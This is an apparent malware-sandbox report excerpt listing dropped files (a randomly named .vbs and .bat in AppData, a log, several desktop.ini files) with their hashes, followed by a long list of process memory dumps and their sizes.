a11e76ce10bc3b9dd33b676857960e43

SHA1
2127dc402bcbaed104346e31ea82226c7b20aa2f

SHA256
6b4b715ac9a381964251a250adcfbaa07bf8bd239837a3a3ca3d8358c6ace19b

SHA512
dbad4764145ccd1400f6501d6368910bf276c069a2b6e74000b71845add75465a729d0fb20f255e2825b56893b92221469da9512965aa51a55ee0cd89fe96f32

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_27024E430F6CED0A.txt

Filesize
28KB

MD5
580121e71cceee419e35674eee307ade

SHA1
d105093c86a1e9b71f50e93a28433967860a1eeb

SHA256
02352ddf5f37e5452b9ae702c66226e23025ac60b4e511981e67afdda8bdc84a

SHA512
761dbb95b79fabfc16451505e4b9ace2f48a3c3b858f2cb77f0fde735806bd81ff68c0d13fb35506c0ce1b2a123c7a5fcc34eb6dd1afd50145989b7ef8e37f9d

Download Submit
C:\Users\Admin\AppData\Roaming\ak974Jqe.vbs

Filesize
260B

MD5
bed26fcf27e9d0b32d83b1e714c88576

SHA1
ad77c49f1d4bd7d3a057369fd2e72e404a0019da

SHA256
55d1d99432ae032b6be1a71d03680d6e284b3d93f1cd85813ec7a2fcfb9fac34

SHA512
334b0ab63cb82048d9b0540a1e36daf1f92b4015bade650a6629b47418eeb98ac5f8acbc6bef3763b1ecac0a57ba8b94f1350cfa176fb8188d1ec14b42560757

Download Submit
C:\Users\Admin\AppData\Roaming\xhHdHGze.bat

Filesize
265B

MD5
bb9edc38cf68e71946cc2af40ce82c25

SHA1
472ab62a861bf4a333bfd95f1957d18ee1bc7d30

SHA256
4012d5c64c3fdd447ca0bb5bd2acbaf6a467004232865222ddaa3888835a769f

SHA512
8ad53c699c98c9bffcad3e527677d710d41cee7b09075f3ff3462789eb257173955f3578ac5ec8500006dd716ec2134cccf8627f03eb006b22a0b2586fb018a9

Download Submit
C:\Users\Admin\Desktop\desktop.ini

Filesize
1KB

MD5
2581271d1200b5dfbfe59b2cb856dc41

SHA1
4d25a13168fcb846a583c6f2d872d33a0ab0a219

SHA256
cab74c73280f3c14ed46b9c969a4e5337a71b0ffb192febc343e7a2302079086

SHA512
b0cf6269e4d49c2932f72c708d0f2433c296e0141f23a9ac609be9005f4bd420faa8d2280a4a81a39a5a9a289be1d80adf1b8463fa41d7d7376ed463c683643a

Download Submit
C:\Users\Admin\Documents\desktop.ini

Filesize
1KB

MD5
65339a31b151fa3b2c27713c821c7f31

SHA1
b594611895114acf56ba6c49119fd534434ea4de

SHA256
dd947d03f346967668c1946c5d8f09a7909dfc6b2dc9b04eff9074c5cd769696

SHA512
5db31979df75a2f2465cf6fb97c56ce84f3b64f1691028f559d90df4c64f170c4b4fb5060d59e7785815b3c4504b8fb42a5c4c3e276e138dabc41a38fe78a7a3

Download Submit
C:\Users\Admin\Downloads\desktop.ini

Filesize
1KB

MD5
55052cc98c5718a197aebe7f2aba390a

SHA1
3c71951d12f65daa8391e8957e74433768ba6ff3

SHA256
9208efc10ab4293db3f7b6595fdee3c03edede2c64420c13a7e1b9399a4015c3

SHA512
66b702ace8e7bdc0eac96b6e9fb29342ae5d3f730b89b95c8a6c7cbe2bcc349b9fa8463545953aeabc349a6bd7103e6216329f888956afa6bb70812adbf7df15

Download Submit
C:\Users\Admin\Music\desktop.ini

Filesize
1KB

MD5
7465f1cc17b5aac2c3f8c277a7a3ce6e

SHA1
e1ebb91cd5656dfc86106108109b18f8fd291145

SHA256
2c6b2ec510c841cfb7dc68b0b2c646402ac14f963324cf3ee010f238fbd5a29e

SHA512
d3827d5fa2061826ed50ade5ee8216f864a6b776cb7fbeea6d4798360854e1a2133c7d806fe1ee9d4d328781e18ce62a279a8238b53aa7f00e39e7c885aa7ea3

Download Submit
C:\Users\Admin\OneDrive\desktop.ini

Filesize
1KB

MD5
8f43e6b76c488346754eb775da861799

SHA1
c3ecf55371a4f531445ea1aae965e3c8311e9d20

SHA256
67d5ff4461cab3d4e093735ade96803a8d466e945557d879de6fcc41c9ec1d03

SHA512
a8b8b3591d015d2902f415bbb892275445e305f87eb200f6467bebfdf98961ba8e15305c7dd4f07ba72d70c047009bd30de0d9cfc87e4173d3916747c42ef31d

Download Submit
C:\Users\Admin\Videos\desktop.ini

Filesize
1KB

MD5
c26270b827dd101c48e1c6fffa7446ae

SHA1
7cf482eb907dc630c1c86d6f15ccbf239216efcc

SHA256
5f4f045dd39516fab71129ddad69846a6f6f8142d1c061f915c32f3fa5d09d01

SHA512
64af9ca89acd36738068482b027c44c40cb2b8259995cf294828a7aa0112b1815f5f3e184d98de9eb373acd7afce22cd023eac291bd4e893fc7f61a32a80fb07

Download Submit
memory/216-6771-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/292-6890-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/404-6941-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/640-6701-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/916-6626-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/916-6820-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/932-6673-0x0000000000400000-0x000000000053F000-memory.dmp

Filesize
1.2MB

Download
memory/1008-6728-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1060-6954-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1064-6951-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1500-6812-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1632-6671-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1652-6808-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1656-6957-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1656-6698-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1720-6849-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1744-6876-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1856-6783-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1964-6695-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1976-6811-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2036-6939-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2188-6927-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2188-6677-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2488-6756-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2900-6797-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3240-6981-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3256-6817-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3324-6904-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3328-6896-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3364-6949-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3476-6881-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3560-6818-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3572-6854-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3696-6691-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/3784-6807-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4580-6748-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4684-6741-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4704-6915-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4916-6688-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4940-6823-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4972-6984-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/4992-6971-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5020-6899-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5132-6774-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5156-6901-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5208-6785-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5236-6844-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5324-6719-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5332-6787-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5364-6998-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5372-6715-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5468-6790-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5544-6944-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5560-6827-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5564-6832-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5616-6973-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5652-6975-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5764-6679-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5764-6681-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5800-6803-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5884-4912-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5884-6686-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5932-6684-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5932-6934-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5952-6917-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/5976-6780-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6008-6910-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6040-6946-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6096-6809-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6172-6822-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6184-6969-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6184-6706-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6204-6829-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6212-6842-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6284-6847-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6308-6868-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6372-6857-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6436-7000-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6444-6873-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6468-6988-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6516-6967-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6556-6793-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6564-6666-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6580-6795-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6592-6965-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6640-6712-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6712-6936-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6716-6993-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6720-6995-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6760-6878-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6768-6743-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6776-6871-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6800-6922-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6820-6726-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6828-6806-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6888-6925-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6888-6674-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/6900-6990-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7000-6057-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7020-6703-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7088-6709-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7108-6724-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7108-6979-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7152-6852-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7160-6731-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7232-6746-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7240-6750-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7304-6736-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7328-6734-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7360-6866-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7368-6859-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7396-6738-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7416-6920-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7468-6977-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7472-6107-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7508-6883-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7692-6758-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7716-6761-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7756-6834-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7800-6801-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7856-6717-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7872-6754-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/7880-6892-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/8036-6768-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/8104-6765-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/8172-6894-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download